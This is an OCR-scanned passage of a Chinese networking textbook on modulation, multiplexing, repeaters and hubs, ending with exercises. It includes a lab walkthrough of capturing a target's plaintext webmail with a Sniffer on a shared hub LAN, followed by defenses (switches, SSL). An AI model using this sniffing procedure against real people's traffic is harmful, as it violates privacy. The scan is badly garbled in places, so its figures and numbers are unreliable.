进 制 数 是 *101”; 第 二 周期 幅 值 为 7, 转换 为 二 进 制 数 是 "111”。 将 模拟 信号 所 有 采样 点 量化 
编码 后 则 转换 成 数字 信号 ,在 接收 端 逆向 还 原 即 可 解 调 为 模拟 信号 ,如 图 3-39(c) 所 示 。 


[--X» 


1 
1 1 
EN | 
101 110 100 011 100 011 010011 011 010 001 
(0) 编码 


图 3-39 ” 脉 码 调制 


然而 , 当 波 形 比 较 缓 时 , 仍 采 用 脉 码 调制 将 会 产生 较 大 误差 ,如 图 3-40 所 示 , 如 第 一 个 
量化 点 值 是 2.7, 取 整 为 3 后 产生 误差 。 为 减少 失真 , 当 波 形 比较 缓 时 有 两 种 办 法 : 四 用 更 
高 精度 的 纵 坐 标量 化 波形 ,但 以 此 转换 必然 会 产生 大 量 数据 ,并 不 利于 实际 传输 ; @ 采 取 增 
量 调制 方法 。 

(2) 增 量 调制 (Data Modulation,DM) 

增 量 调制 用 二 进 制 数 的 0” 和 “1” 分 别 表示 波形 的 负增长 和 正 增长 ,而 与 波形 幅 值 无 关 。 
增 量 调制 以 恒定 步 长 6 生成 阶梯 函数 近似 波形 ,如果 阶 梯 函 数 下 一 周期 是 上 升 的 ( 即 下 一 信 


和 


@ 分 级 取 整 就 是 根据 模拟 信号 最 大 幅 值 等 分 为 若干 等 级 (通常 为 2n 等 级 ) ,而 后 测量 得 到 的 幅 值 按 此 分 级 伟人 取 
整 ,得 到 一 个 正 整数 。 例 如 模拟 信号 最 大 幅 值 为 256, 可 将 其 分 为 128 级 , 则 幅 值 在 [0,2) 中 量化 为 0; 幅 值 在 [2,4) 中 量 
化 为 1; …… 幅 值 在 [254,256) 中 量化 为 127。 
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号 抽 值 属于 正 增长 ), 则 用 二 进 制 *1” 表 示 ,如果 阶梯 函数 下 一 周期 是 下 降 的 ( 即 下 一 信号 抽 
值 属于 负增长 ), 则 用 二 进 制 “0 表示 ,从 而 ,把 模拟 信号 转换 为 二 进 制 编码 ,如 图 3-41 所 示 。 
增 量 调制 实现 比 脉 码 调制 简单 , 数 模 转换 后 失真 较 小 , 误 码 率 较 低 ,广泛 应 用 于 军事 通信 、IP 
电话 和 卫星 数据 传输 之 中 。 


" 


| 


(b) 生成 阶梯 函数 


4 


- 进 制 数 信号 幅 值 
0 
7 


(0) 转变 为 二 进 制 数据 
图 3-41 增 量 调制 


3.3 多 路 复 用 技术 


多 路 复 用 技术 是 指 在 单一 信道 上 同时 传输 多 路 信号 ,以 提高 线路 利用 率 和 节省 信道 资 
源 。 复 用 技术 按 信 号 的 复合 方式 可 以 划分 为 4 类 ,分 别 是 频 分 多 路 复 用 (FDM) 、 同 步 时 分 
复 用 (TDM) 、 异 步 时 分 复 用 (STDM) 和 波 分 多 路 复 用 (WDM)。 

1. 频 分 多 路 复 用 

频 分 多 路 复 用 (Frequency Division multiplexing,FDM) 可 以 将 多 路 模拟 信和 号 调制 到 不 
同 频率 载波 上 ,又 加 而 成 一 路 复合 模拟 信号 。 任 何 模拟 信和 号 只 占据 一 个 宽度 有 限 的 频率 ,而 
信道 上 可 被 利用 的 频率 比 单个 信号 频率 宽 很 多 ,因而 可 以 利用 频率 分 隔 方法 实现 多 路 模拟 
信号 的 复 用 。 频 分 多 路 复 用 技术 在 生活 中 有 许多 应 用 ,如 调谐 收音 机 的 无 线 广播 可 以 接收 
多 个 电台 、 有 线 电视 模拟 信号 可 以 同时 传输 多 个 节目 等 ,如 图 3-42 所 示 。 
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珠江 电视 台 240.25MHz 
中 央 电视 台 245.25MHz 


北京 电视 台 250.25MHz 


广东 电视 台 500.25MHz 
3-42 频 分 多 路 复 用 


传统 的 有 线 电视 在 调制 模拟 信号 时 ,多 个 广播 电台 节目 通过 同 轴 电缆 单一 信道 进行 传 
输 , 必 须 将 线路 频带 资源 划分 为 多 个 子 频 带 , 每 个 电台 租用 所 属 子 频带 ,即使 没有 数据 传输 
其 他 电台 也 不 能 占用 。 例 如 ,珠江 电视 台 占 用 240.25MHz 频率 ,把 数据 加 载 到 频率 
240. 25MHz 的 模拟 波 进行 传输 ; 中 央 电视 台 占用 245. 25MHz 频率 等 。 频 率 太 近 的 模拟 波 
会 相互 串扰 ,如 一 个 画面 同时 显示 两 个 模糊 不 清 的 电台 内 容 。 为 避免 串扰 , 相 邻 频带 之 间 必 
须 设 立 一 定 频率 的 保护 带 。 所 谓 保 护 带 ,就 是 带宽 中 不 用 的 部 分 ,处 于 保护 带 内 的 频率 不 用 
于 加 载 任何 数据 , 当 电视 机 调频 时 , 台 与 台 之 间 出 现 的 雪花 就 是 保护 带 。 在 图 3-42 中 ,珠江 
电视 台 和 中 央 电 视 台 之 间 设 立 有 5MHz 的 保护 带 。 

频 分 多 路 复 用 属于 模拟 信号 的 复 用 技术 ,多 条 模拟 波 复合 后 能 有 效 提高 线路 利用 率 和 
带宽 。 对 于 数字 信和 号 而 言 ,由 于 单条 信道 只 能 传输 一 路 数字 信号 , 故 复 用 只 能 对 各 路 信和 号 实 
际 传输 时 间 进 行 复 用 。 数 字 信号 的 复 用 有 同步 时 分 复 用 和 异步 时 分 复 用 两 种 技术 。 

2. 同步 时 分 复 用 

同步 时 分 复 用 (Synchronous Time Division Multiplexing, STDM) 是 数字 信和 号 常用 的 复 
用 技术 。 例 如 ,USB 集线器 可 以 通过 一 个 USB 口 同时 接 入 多 个 设备 ,网 络 集线器 通过 同步 
时 分 复 用 让 多 台 计 算 机 同时 接 入 Internet。 如 图 3-43 所 示 ,4 台 客 户 机 同时 通过 集线器 接 
入 外 网 服务 器 ,但 总 线 只 能 传输 一 路 数字 信和 号。 为 让 所 有 用 户 都 能 同时 上 网 ,集线器 根据 端 
口 数量 将 每 帧 划分 成 4 个 时 隙 ,第 1 时 隙 固定 转发 第 一 端口 数据 ,即使 该 端口 没有 接 和 人 计算 
机 或 没有 数据 待 传输 ; 第 2 时 阶 固 定 转发 第 二 端口 数据 ,第 3 时 隙 固定 转 发 第 三 端口 数据 ， 
如 此 类 推 。 由 于 每 个 端口 实际 占用 的 传输 时 间 被 平均 分 配 , 因 此 带宽 也 被 平均 分 配 , 假 如 集 线 
器 有 个 端口 , 则 每 帧 都 要 划分 个 时 际 ,此 时 每 台 计 算 机 接 入 外 网 带宽 只 有 总 线 的 1/n。 


3 
Es 
¥ 
集 
线 
器 


图 3-43 同步 时 分 复 用 


同步 时 分 复 用 技术 实现 简单 ,即使 端口 没有 实际 数据 传输 也 要 占用 时 隙 ,这 种 平均 分 配方 
案 会 造成 时 隙 浪费 ,线路 利用 率 低 。 为 改进 STDM 效率 低下 问题 ,引入 异步 时 分 复 用 技术 。 
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3. 异步 时 分 复 用 

异步 时 分 复 用 (Asynchronous Time Division Multiplexing,ATDM) 能 动态 按 需 分 配 时 
际 ,避免 数据 帧 中 出 现 空 闪 时 际 。ATDM 复 用 方案 是 只 有 在 端口 有 数据 传输 时 才 把 时 隙 分 
配给 它 , 当 某 一 端口 出 现 空闲 时 ,其 时 隙 可 用 于 其 他 端口 进行 数据 传输 ,因此 用 户 可 以 同时 
占用 多 个 时 隙 传输 数据 , 当 占用 所 有 时 隙 时 达 线 路 全 部 带宽 。 交 换 机 是 采用 异步 时 分 复 用 
技术 的 网 联 设备 ,如 图 3-44 所 示 ,假如 只 有 端口 1 和 端口 4 有 数据 要 传输 ,此 时 每 个 端口 各 
占 两 个 时 隙 ,传输 带宽 为 总 线 带宽 的 1/2。 


化 潍 流 sSdqN001 


图 3-44 异步 时 分 复 用 


4. 波 分 多 路 复 用 

目前 , 单 模 光 纤 传 输 速率 可 达 2. 5Gbps, 已 经 达到 单条 光束 的 峰值 。 为 提升 传输 速率 ,可 
以 在 单条 光纤 中 同时 传输 多 路 光 信号 , 称 为 波 分 多 路 复 用 (Wavelength Division Multiplexing， 
WDM) 技 术 。 如 图 3-45 所 示 ,两 束 不 同 波长 的 光纤 通过 光栅 衍射 后 汇聚 在 一 起 , 当 通 过 单 
条 光纤 传输 至 目的 节点 后 ,再 将 过 光栅 衍射 分 解 成 两 束 光 。 


波长 41 波长 21 
波长 12 波长 22 
光栅 光栅 


图 3-45 波 分 多 路 复 用 
目前 ,20Gbps(8X2. 5Gbps) 亚 欧 海底 光缆 以 投入 使 用 ,全 长 39000km ,连接 了 33 个 国 
家 和 地 区 ; 2010 年 亚太 2 号 海底 光缆 斥资 10 亿美 元 将 带宽 将 级 至 40Gbps (16 X 
2.5Gbps)。 中 美 第 二 条 海底 光缆 于 2008 年 10 月 在 青岛 正式 开工 建设 ,带宽 达 5Tbps 
(5120Gbps) ,采用 多 条 光缆 同时 传输 ,成 为 世界 上 最 快 的 “信息 高 速 公路 ”。 


3.4 物理 层 网 联 设备 和 安全 


工作 任务 四 截获 信件 内 容 


工作 目的 
使 用 Sniffer 监听 工具 捕获 信件 内 容 。 
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工作 任务 

小 张 是 公安 机 关 科 技 部 工作 人 员 , 需 对 疑犯 王 某 进 行 24h 监控 。 王 某 走 进 网 吧 通 过 邮 
件 通知 与 之 接头 的 许 某 ,包括 时 间 、 地 点 和 交接 方式 。 上 级 要 求 小 张 在 网 吧 进 行 蹲点 ,并 学 
试 捕获 王 某 发 送 邮件 的 内 容 和 收 件 人 账号 。 

任务 分 析 

小 张 发 现 网 吧 部 分 网 段 通过 集 线 连接 。 由 于 集线器 采取 广播 方式 发 送 数据 , 故 只 要 和 
对 方 处 于 同一 广播 域 的 所 有 主机 都 能 接收 到 数据 包 。 经 分 析 , 小 张 查阅 座位 表 序 号 获得 王 
某 IP 地 址 ,通过 Sniffer 监听 软件 尝试 捕获 王 某 发 送 的 信件 内 容 。 

工作 环境 和 工具 

工作 任务 四 的 工作 环境 拓扑 图 如 图 3-46 所 示 , 工 具 和 录像 可 在 http://www. gdcp. cn/ 


jpkc/lf 中 下 载 。 
集线器 
时 

主机 1 小 张 主机 2 ”疑犯 王 某 

IP: 192.168.1.20 IP: 192.168.1.10 

Mask : 255.255.255.0 Mask : 255.255.255.0 
E 机 名 称 担任 角色 | tp 地 址 ”| 子 网 捧 码 ”| 操作 系统 | 软件 
主机 1 | 小 张 | 192.168.1.20 255.255.255.0 | Windows XP | Sniffer 


主机 2 | 疑犯 王 某 | 192.168.1.10 | 255.255.255.0 | Windows XP 


图 3-46 工作 任务 四 的 工作 环境 拓扑 图 


(1) 用 集线器 组 成 的 局 域 网 被 称 为 共享 式 局 域 网 ,处 于 局 域 网 中 的 所 有 客户 机 通过 同 
步 时 分 复 用 技术 共享 带宽 ,每 时 际 任 一 节点 发 送 的 比特 流 都 会 广播 至 其 他 所 有 端口 上 ,这 种 
现象 叫 作 广播 风暴 。 因 此 ,共享 式 局 域 网 存在 安全 问题 ,任何 一 端口 都 能 监听 到 其 他 端口 发 
送 的 比特 流 。 

(2) Sniffer 嗅 探 器 是 常用 的 被 动 侦 听 软 件 ,利用 它 可 以 监视 网 络 状态 .数据 流向 以 及 网 
络 中 传输 的 信息 。 网 卡 在 收 到 不 是 发 向 给 它 的 数据 时 会 丢弃 数据 , 仅 利用 Sniffer 将 网 卡 接 
口 设置 为 混杂 模式 , 便 可 以 截获 网 络 中 传输 的 信息 。 目 前 ,Sniffer 广泛 应 用 于 网 络 故 障 检 测 、 
协议 分 析 、 网 络 优化 和 网 络 安全 等 各 领域 ,也 常常 被 黑客 用 于 截获 口令 密码 、 定 位 攻击 目标 。 

工作 过 程 

(1) 配置 捕获 数据 地 址 。 启 动 主机 1 的 Sniffer 监听 工具 ,在 弹出 的 “ 自 定义 过 滤器 ”对 
话 框 中 的 “地 址 类 型 "下 拉 列 表 中 选择 IP 选项 ,输入 主机 2 王 某 IP*192. 168. 1.10”, 监 听 其 
与 任意 主机 之 间 的 通信 ,如 图 3-47 所 示 。 

(2) 过 滤 协 议 类 型 。 在 “高 级 ”选项 卡 中 定义 需要 捕获 的 数据 包 协 议 类 型 。 通 过 网 页 登 
录 邮 箱 基于 HTTP 协议 ,选中 “IP”>“TCP”>“HTTP” 复 选 框 ,如 图 3-48 所 示 。 
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3-48 ”指定 监听 协议 类 型 


(3) 登录 邮箱 发 送 邮 件 。 在 主机 2 模拟 王 某 登录 新 浪 邮箱 发 送 邮 件 , 如 收 件 人 地 址 
“gdcplee@263. com” ,信件 内 容 为 “see you tomorrow. ”, 并 发 送 邮 件 , 如 图 3-49 所 示 。 


[本] 提示 : 你 最 多 可 以 泽 加 20 个 附件 ,能 安 送 的 附件 总 大 小 最 大 为 15M 


[Bu AA ee| 国 | 总 | 革 信 多 ” 切 汉 到 全 部 功能 


See you tomorrow. 


图 3-49 通过 新 浪 邮箱 发 送信 件 


(4) 对 捕获 数据 包 解 码 。 单 击 Sniffer 工具 的 “停止 监听 ”按钮 ,并 在 底部 标签 栏 中 选中 
“解码 选项 ,查看 截获 到 的 数据 帧 ,如 图 3-50 所 示 。 
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TCP Connection; Port 80-1084 
白 轩 [121.194.0.193] 
Ny o00FE24zC878 
日 - 蝎 [192.168.1.10] 
一 000C29799977 


3-50 ”解码 截获 数据 


(5) 查找 数据 帧 。 由 于 截获 到 的 数据 帧 很 多 ,为 快速 定位 到 包含 用 户 名 和 密码 的 数据 
帧 , 右 击 并 查找 含有 "POST 文本 的 数据 帧 ,如 图 3-51 所 示 。 


本 到 
文本 | 数据 | 状态 | 专家 | 
搜寻 文本 : 
搜寻 从 : 人 摘要 文本 WW) 个 数据 ASCII 
个 细节 文本 (入 数据 Nex Qf 
厅 对 应 大 小 写 


搜寻 方向 : 个 向 上 个 向 F 的 


图 3-51 查找 数据 帧 


(6) 搜索 账号 名 和 密码 。 仔 细 查 找 含 有 “POST”0 文 本 的 数据 帧 ,发 现 含 有 收 件 人 地 址 
“gdcplee@263. com” 和 信件 内 容 “see you tomorrow. ”, 如 图 3-52 所 示 。 


|000005e0: 31 31 6e 74 65 6e 74 2d 44 112. .Content-Dis 
i000005£0: 70 6f 6e 3a 20 66 6f 72 6d 
[00000600: 61 74 6d 65 3d 22 74 6f 22| 
i00000610 
i00000620 
00000630 
00000640 
|00000650: 6f 6e 44 69 73 70 6f 73 69 ontent-Dispositi 
|00000660: 6f 6e 6d 2d 64 61 74 61 3b on: form-data; n 
00000670: 61 6d 22 0d 0a 0d 0a 0d 0a ame="cc" 一 
00000680: 
00000650 


ata; nane="to” 
gdcplee@263 .co 
Fe 本 


00000910: 2d 2d 32 33 38 30 31 31 32 0d 一 7d91572380112 
000000320: Oa 43 2d 44 69 73 70 6f 73 69 .Content-Disposi 
00000930: 74 69 72 6d 2d 64 61 74 61 3b 
00000940: 20 6e 73 67 74 78 74 22 0d 0 
00000950: 0d oa 75 20 74 6f 6d 6f 72 7?: 
00000360: 6£ 77 2d 2d 2d 2d 2d 2d 2d 2d or 

00000970: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2 

00000980: 2d 37 33 38 30 31 31 32 0d 0a -7d91572380112 
00000330: 43 6f 44 69 73 70 6f 73 69 74 Content-Disposit 


图 3-52 查看 收 件 人 地 址 和 信件 内 容 


@ 不 是 一 定 要 输入 *POST" 关 键 字 , 另 外 不 同 邮箱 也 有 不 同 的 关键 字 , 这 需要 经 验 的 积累 过 程 。 在 图 3-52 中 找到 
的 收 件 人 地 址 ,以 后 查找 * name 一 "或 “Disposition "文本 也 可 以 迅速 定位 到 该 帧 ,建议 读者 先 利用 自己 邮箱 试 ,定义 比较 刁 
专 的 关键 字 可 以 有 效 降低 查找 复杂 度 。 
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任务 总 结 着 © 莉 通 全 录 [ 手机 号 登录 0 四 

由 于 物理 层 集线器 会 将 端口 发 送 的 数据 广播 | * 5 lgdcplee @163.com 
至 所 有 端口 中 ,因此 共享 式 局 域 存在 安全 隐患 。 | a [一 一 一 | swan 
对 此 ,第 一 种 防范 方法 是 改 用 交换 机 升级 到 交换 | 。， 一 


式 局 域 网 ,第 二 种 是 选择 支持 网 页 加 密 的 邮件 服 
务 器 ,如 网 易 邮箱 可 以 利用 “SSL”O 对 网 页 信息 进 
行 加 密 , 如 图 3-53 所 示 。 


固 两 赂 内 自动 音 录 国峰 |5sL 雪 全 且 录 


于 录 闻 箱 过 属 太 借 9 请 点 击 这 里 


a 知 识 拓 展 2011 第 四 季 中 国 反 垃 扫 状 况 调查 | 在 乒 答疑 


。 Flrefox 同 易 邮 箱 专 版 ， 即 时 邮件 提醒 


信号 衰减 极 大 限制 了 网 络 履 盖 范 围 ,例如 双 绞 
线 不 中 继 只 能 传输 100m, 再 延长 其 传输 距离 会 导 
致 信号 失真 出 错 ,用 于 数据 重 传 的 时 延 会 大 于 实际 传输 时 间 ,效率 低下 。 为 解决 信号 远 距离 
传输 的 衰减 和 出 错 问题 , 需 对 信号 在 传输 途中 放大 中 继 ,从 而 拓展 信号 的 传输 距离 和 网 络 履 
盖 范 围 。 在 物理 层 对 信号 中 继 的 网 联 设备 有 两 种 ,分 别 是 中 继 器 和 集线器 。 


3.4.1 中 继 器 


中 继 器 (Repeater) 是 单 进 单 出 的 物理 层 网 联 设备 ,通过 对 物理 信号 复制 .整形 和 放大 来 
延长 电缆 传输 距离 ,从 而 拓展 主机 数量 和 扩大 网 络 覆 盖 范 围 。 中 继 器 只 对 信号 进行 放大 而 
不 做 校 检 , 故 错误 信号 也 同样 放大 ,不 具备 数据 检 错 能 力 。 

早期 使 用 中 继 器 组 建 的 局 域 网 利用 同 轴 电缆 作为 传输 介质 ,带宽 为 10Mbps, 每 个 网 段 
线 缆 长 度 为 500m@。 为 拓展 网 络 覆盖 范围 ,可 将 多 个 网 段 用 中 继 器 连接 。 然 而 ,中 继 器 不 
可 以 无 限制 地 扩展 网 络 覆 盖 范 围 ,构建 一 个 正常 运行 的 局 域 网 必须 满足 如 下 公式 。 

DTE 延迟 十 Mac 延迟 十 中 继 器 延迟 十 电缆 延迟 25. 6pns@ 

也 就 是 说 ,局 域 网 内 任意 两 点 间 信 号 延迟 总 和 应 小 于 25. 6us, 从 而 制定 组 建 同 轴 电 缆 
以 太 网 的 “5-4-3-2-1” 原 则 。 

(1) 5: 局 域 网 最 多 可 以 有 5 个 网 段 。 

(2) 4; 局 域 网 最 多 可 连接 4 个 中 继 器 。 

(3) 3: 其 中 3 个 网 段 可 以 连接 主机 。 

(4) 2: 其 中 两 个 网 段 只 用 来 延长 信号 传输 距离 ,不 连任 何 站 点 以 减少 网 络 冲突 @, 提 高 


图 3-53 对 邮件 进行 SSL 加 密 


@ ”SSL(Secure Sockets Layer) 安 全 套 接 字 层 是 在 传输 层 为 网 络 通信 提供 安全 及 数据 完整 性 的 一 种 安全 协议 ,浏览 
器 会 根据 服务 器 证 书 产生 40 位 或 128 位 的 密 钥 进行 加 密 。 虽 然 经 SSL 加 密 的 密 文 也 可 以 被 Sniffer 截获 ,也 有 方法 破 
解 ,但 是 可 以 有 效 增加 破解 的 复杂 度 和 时 间 。 

四 ” 粗 同 轴 电 缆 每 隔 500m 需要 被 中 继 一 次 , 双 绞 线 每 隔 100m 要 中 继 一 次 。 

国 ” 由 于 数据 帧 最 小 长 度 为 512 位 ,每 发 送 1 位 时 间 是 0. 1ps, 发 送 完 最 小 帧 需要 51. 2ps。 当 发 送 方 数据 在 传输 途 
中 受到 冲撞 导致 出 错 , 接 收 方 可 以 沿 原 路 径 反 回应 答 信息 报错 ,从 发 送 方 发 送 数据 到 得 知 出 错 整 个 过 程 总 延迟 不 得 多 于 
51. 2ps( 即 单 向 延迟 不 得 多 于 25. 6ps) ,否则 会 导致 发 送 方 尚未 收 到 错误 应 答 ,而 已 发 送 下 一 帧 数据 ,造成 数据 出 错 。 将 
双方 主机 信号 延迟 限制 于 25. 6ps 旨 在 发 送 方 在 发 送 本 帧 数据 过 程 中 能 及 时 接收 到 应 答 信息 。 

图 ”冲突 是 由 于 单一 信道 只 能 传输 一 路 数字 信号 , 若 多 台 主 机 同时 占用 信道 发 送 数据 则 产生 冲突 。 
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网 络 效 率 。 
(5) 1: 由 此 组 成 一 个 最 大 覆盖 2. 5km 的 局 域 网 ,如 图 3-54 所 示 。 


网 
工作 站 A 工作 站 B 工作 站 N 
网 段 2 


图 3-54 10Mbps 同 轴 电缆 共享 局 域 网 


(四) 思考 : 在 图 3-53 中 ,网 卡 处 理 延迟 0. 71st 中 续 器 处 理 延迟 4ps, 网 自传 输 延 巡 
0.55ps, 该 局 域 网 能 否 正常 工作 ? 
由 于 工作 站 A 和 工作 站 N 是 相距 最 远 的 站 点 ,途经 4 个 中 继 器 5 个 网 段 ,只 要 相距 最 
远 的 工作 站 之 间 信 号 延迟 过 25. 6ps, 则 网 络 中 所 有 站 点 都 能 正常 传输 数据 。 工 作 站 A 和 工 
作 站 N 双方 延迟 为 
0.7X2 十 4X2 十 0.55X5 入 25. 6ps 
因此 ,整个 局 域 网 能 够 正常 工作 。 


3.4.2 集线器 


集线器 (Hub) 工 作 于 OSI 参考 模型 的 物理 层 , 通 过 对 信号 中 继 放 大 以 延长 信号 传输 距 
离 ,拓展 网 络 覆 盖 范 围 , 本 质 上 讲 集线器 是 一 个 多 端口 的 中 继 器 ,和 中 继 器 一 样 共 享 单一 数 
据 总 线 , 如 图 3-55 所 示 。 


客户 机 4 


客户 机 3 


客户 机 2 


客户 机 1 外 网 服务 器 
100Mbps 集 线 器 


图 3-55 集线器 内 网 工作 原理 


集线器 将 所 有 端口 汇聚 于 一 条 数据 总 线 ,通过 同步 时 分 复 用 技术 连接 至 外 网 。 在 图 3-54 
中 ,客户 机 1 把 数据 发 送 给 客户 机 2, 网 络 中 所 有 主机 甚至 外 网 都 能 接收 到 比特 流 , 但 其 他 
计算 机 最 终 会 因 地 址 不 吻合 而 丢弃 。 
在 与 外 网 通信 中 ,中 继 器 通过 同步 时 分 复 用 共享 单一 信道 ,因此 集线器 端口 越 多 ,每 台 
主机 分 到 的 带宽 越 少 ,如 图 3-56 所 示 。 
由 此 可 见 ,在 集线器 中 ,不管 是 内 外 通信 还 是 外 网 通信 都 会 通过 时 分 复 用 平分 带宽 ,在 
sl 
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器 小 浪 sdqWN001 - 


共享 式 局 域 网 


图 3-56 集线器 外 网 工作 原理 


图 3-55 和 图 3-56 中 每 台 客 户 机 的 带宽 都 是 25Mbps@( 即 内 网 带宽 和 外 网 带宽 都 一 样 ) 。 
集线器 还 可 以 通过 级 联 方式 将 一 个 小 型 局 域 网 级 联 成 大 型 局 域 网 ,如 图 3-57 所 示 。 在 
级 联 中 ,集线器 只 与 它 的 上 层 集线器 通信 ,底层 端口 之 间 不 直接 通信 ,而 是 通过 顶层 集线器 
将 信息 广播 至 所 有 端口 上 。 因 此 ,图 3-57 中 所 有 主机 之 间 的 带宽 都 是 100/12Mbps, 任 意 一 
台 主机 发 送 的 数据 都 会 广播 至 整个 网 络 中 的 所 有 主机 ,这 种 现象 称 为 广播 风暴 。 广 播 风 暴 
既 会 堵塞 带宽 ,影响 网 络 性 能 ,又 存在 安全 隐患 , 故 在 实际 中 应 尽量 减少 集线器 级 联 数量 ,或 


改 用 交换 机 级 联 。 


ose 


图 3-57 集线器 级 联 图 


3.4.3 物理 层 安 全 措施 


物理 层 安全 分 为 环境 安全 .设备 安全 和 线路 安全 3 个 方面 ,采取 的 措施 包括 电磁 屏蔽 、 
电源 接地 、 隐 藏 布线 和 传输 加 密 等 。 物 理 层 负责 比特 传输 ,处 于 OSI 参考 模型 的 最 底层 ,是 
整个 网 络 体系 安全 的 基础 ,布线 时 应 尽量 选取 抗 干扰 性 强 、 防 窃听 的 传输 介质 ,并 减少 集 线 


器 级 联 数量 ,分割 或 减少 广播 域 。 


@ 网 联 设备 最 大 带宽 以 波 特 率 为 单位 ,用 一 个 数字 波 代表 一 个 比特 。 计算机 文件 是 以 字 节 为 单位 存储 ,因此 在 实际 
中 100Mbps 集线器 只 能 提供 约 100MB/8 二 12MB 共享 带宽 ,车 集线器 有 4 个 端口 , 则 每 台 主 机 实际 传输 带宽 只 有 3MB。 
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第 3 章 物理 层 及 数据 通信 基础 
单 模 光 纤 是 一 种 速度 最 快 、 容 量 最 大 、 安 全 性 和 保密 性 最 好 的 传输 介质 。 虽 然 光 波 也 属 
于 电磁 波 , 但 不 存在 电磁 辆 射 , 也 不 会 受到 因 电 磁 干 扰 导 致 的 泄密 窃听 安全 问题 。 


本 章 小 结 


本 章 知 识 点 很 多 , 既 涉及 物理 层 ,又 涉及 数据 通信 基础 ， 既 讲 到 物理 层 网 联 设备 实现 原 
理 ,又 讲 到 所 存在 的 安全 问题 ; 既 有 数据 编码 技术 ,又 有 数字 传输 和 模拟 传输 ,内 容 繁杂 , 挛 
连 其 多 ,学 习 时 应 把 握 好 之 间 内 在 的 逻辑 与 层次 关系 。 虽然 物理 层 和 数据 通信 属于 不 同 范 
哮 , 但 两 者 密 不 可 分 ,都 与 比特 传输 息息相关 ,一 个 是 标准 , 另 一 个 是 具体 的 实现 方式 。 本 音 
知识 结构 如 图 3-58 所 示 。 


幅 移 
sl mg 
数 模 转 换 oe 
码 调制 
袖 换 歼 { 者 量 调 
单 级 性 不 归 零 码 
双 级 性 不 归 零 码 
本 单 级 性 归 零 码 
数字 模拟 4 数字 
数字 编码 双 级 性 归 堆 码 
双 级 性 差分 编码 
曼彻斯特 码 
频 分 
比特 传输 ，A [同步 时 分 
数 模 复 用 1 时 分 | 噶 业 时分 
波 分 
并 行 串 行 
物理 层 功能 同步 异步 
单 工 . 半 双 工 和 全 双 工 
机 械 特性 
电气 特性 
义 DET 与 DCE 
全 人 功能 特性 
物理 层 规程 特性 
双 绞 线 
同 轴 电 缆 
物理 层 传输 介质 光纤 
无 线 传输 
,| 中 继 器 
物理 层 设备 | 入 中 


图 3-58 第 3 章 知识 结构 图 
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思考 练习 题 


一 、 填空 题 
1. 集线器 工作 于 OSI 参考 模型 的 
2. 常用 的 多 路 复 用 技术 有 3 种 ,分 别 是 同步 时 分 复 用 技术 、 异 步 时 分 复 用 技术 


和 技术 。 

3. 在 每 个 字符 前 后 分 别 加 上 起 始 位 和 结束 位 独立 传输 ,传输 速率 较 低 ,这 种 传输 方式 
叫 作 。 

4. 双 绞 线 分 为 直 连 线 和 交叉 线 , 其 中 交换 机 接 交 换 机 用 的 是 。 


5. 光纤 分 为 单 模 光 纤 和 多 模 光 纤 , 其 中 用 于 远 距 离 传输 的 是 
6. 在 实际 中 需要 利用 数字 传输 和 模拟 传输 各 有 优点 ,从 成 本 上 考虑 最 好 用 


从 传输 质量 上 考虑 最 好 用 ,在 远 距 离 传输 中 用 到 
二 、 选 择 题 
1. 线 器 实质 上 是 一 个 多 端口 的 
A. 中 继 器 B. 集线器 C. 网 桥 D. 路 由 器 
2. 将 符合 10BASE-T 标准 的 4 个 Hub 连接 起 来 ,那么 在 这 个 局 域 网 中 相隔 最 远 的 两 
台 计算 机 之 间 的 最 大 距离 为 和 
A. 200m B. 300m C. 400m D. 500m 
3. 在 同一 个 冲突 域 中 ,节点 到 节点 之 间 的 数据 延迟 要 小 于 等 于 
A. 25.6ps B. 51.2ps C. 25. 6s D，51. 2s 
4. 中 继 器 用 于 网 络 互联 ,其 目的 是 
A. 再 生 信号 ,扩大 网 络 传输 距离 B. 连接 不 同 访问 协议 的 网 络 
C. 控制 网 络 中 的 “广播 风暴 ” D. 提高 网 络 速率 
5. 通信 信道 的 每 一 端 既 可 以 是 发 送 端 ,也 可 以 是 接收 端 ,但 在 同一 时 刻 里 ,信息 只 能 有 
一 个 传输 方向 的 通信 方式 称 为 
A. 单 工 通信 B. 半 双 工 通信 C. 全 双 工 通信 D. 模拟 通信 
6. FDDI 是 一 种 以 作为 传输 介质 的 高 速 主 干 网 。 
A. 双 绞 线 B. 同 轴 电 缆 C. 光纤 D. 微波 
7. 为 合理 分 配 通 信和 信道 以 满足 用 户 不 同 的 速率 要 求 ,并 提高 信道 的 利用 率 ,通常 采取 
的 措施 是 
A. 多 路 访问 控制 B. 交换 技术 C. 并 行 传输 技术 D. 多 路 复 用 技术 
8. 中 继 器 工作 于 OSI 参考 模型 的 物理 层 , 不 能 对 数据 包 转 换 和 过 虑 ,因而 要 求 连接 的 
两 个 网 络 5 
A. 具有 相同 的 传输 介质 B. 具有 相同 的 介质 访问 方式 
C. 使 用 同一 种 网 络 操作 系统 D. 使 用 同一 种 传输 协议 
9. 在 局 域 网 中 用 来 扩展 线 线 长 度 的 中 继 器 最 多 可 以 有 人 
A. 无 数 BB: C. 4 BD; 5 
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0. 在 以 下 传输 介质 中 ,带宽 最 宽 , 抗 干扰 能 力 最 强 的 是 S 
A. 双 绞 线 B. 无 线 信道 C. 同 轴 电缆 D. 光纤 

1. IEEE 802. 3 的 物理 协议 10BASE-T 规定 从 网 卡 到 集线器 的 最 大 距离 为 
A. 100m B. 200m C. 300m D. 400m 


2. RS-232-C 串口 总 线 规定 : 十 3 一 十 18V 代表 数字 “0”, 一 3 一 一 18V 代表 数字 “1”, 这 
属于 物理 层 接口 的 


A. 机 械 特性 B. 电器 特性 C. 规程 特性 D. 功能 特性 
3. 同步 传输 中 的 同步 是 指 5 
A. 时 钟 频率 同步 B. 时 钟 同步 C. 传输 速度 同步 ”D. 位 ,字符 同步 
4. 下 列 不 属于 调制 技术 的 是 
A. 幅 移 键 控 B. 频 移 键 控 C. 相 移 键 控 D. 位 移 键 
5. 在 无 线 蜂 窝 移动 通信 系统 中 ,多 址 接 入 方法 主要 有 以 下 3 种 , 即 FDMA TDMA 
与 E 
A. CSMA B. GSM C. GPRS D. CDMA 
6. 数字 通信 的 优点 不 包括 
A. 设备 简单 B. 传输 质量 高 C. 传输 距离 远 。 D. 线路 容量 大 
17. 在 数据 传输 中 ,信号 噪声 是 指 
A. 声 贝 大 于 80dB 的 声音 B. 来 自 线路 外 的 意外 信和 号 
C. 出 错 数据 D. 信和 号 衰减 
